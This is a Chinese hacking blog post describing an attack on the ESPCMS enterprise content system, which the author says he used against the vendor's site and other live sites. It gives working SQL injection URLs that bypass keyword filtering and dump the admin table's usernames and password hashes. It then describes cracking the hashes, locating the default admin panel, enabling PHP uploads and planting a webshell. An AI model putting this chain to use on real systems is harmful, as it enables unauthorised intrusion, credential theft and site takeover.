易思企业系统Espcms注入漏洞+后台拿shell

作者：阿峰

博客：www.afeng.org

今天下午看到seay发表一篇文章，【Espcms 通杀 SQL注入漏洞分析附EXP+拿下官网】
下载了他的exp，找了几个网站，都没有爆出来，成功率很低...，如图

我就找他调侃了一会，
刚开始他说也不知道是怎么回事，后来听他说知道了…不知道他是否更新了…

关于漏洞文件和细节我就不说了，根据他的注入语句我重新修改了一下。

爆前缀：

/index.php?ac=search&at=taglist&tagkey=%2527,tags) or did>1 and 97=ascii((seselectlect mid(username,1,1) frfromom espcms_admin_member limit 1)) limit 1– by afeng

有图有真相，先来测试一下espcms的官网吧，如图：

看到了吧，前缀是espcms…然后继续爆用户名和密码，无果。就去问了一下seay，他说官网已经修复了，好吧。
我们再来看看其他网站是如何的呢？

爆用户名和密码：

/index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,username,0×27,password)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

比如官方的前缀是espcms，那么在爆用户名和密码的时候，语句中的前缀二字要修改为espcms。
测试了三个站，成功率还是蛮高的，如图：

————————-分割线———————————————


————————-分割线———————————————

————————-分割线———————————————
我高高兴兴的拿去破解md5，次噢，提示您输入的密文格式不对，我仔细数了数33位，
第一次见，给泼了一盆凉水…我对比了一下这三个MD5，我惊喜发现最后一位都是数字1，
果断删去最后1位，再解，提示收费，好吧，果断购买。

网站的账号和密码，咱都有了，该进行下一步了…

易思ESPCMS默认后台地址：/adminsoft/index.php

后台拿shell很简单，系统设置–图片功能设置–修改上传类型，添加php。



直接上传网马或者一句话，都可以…

提权就不说了…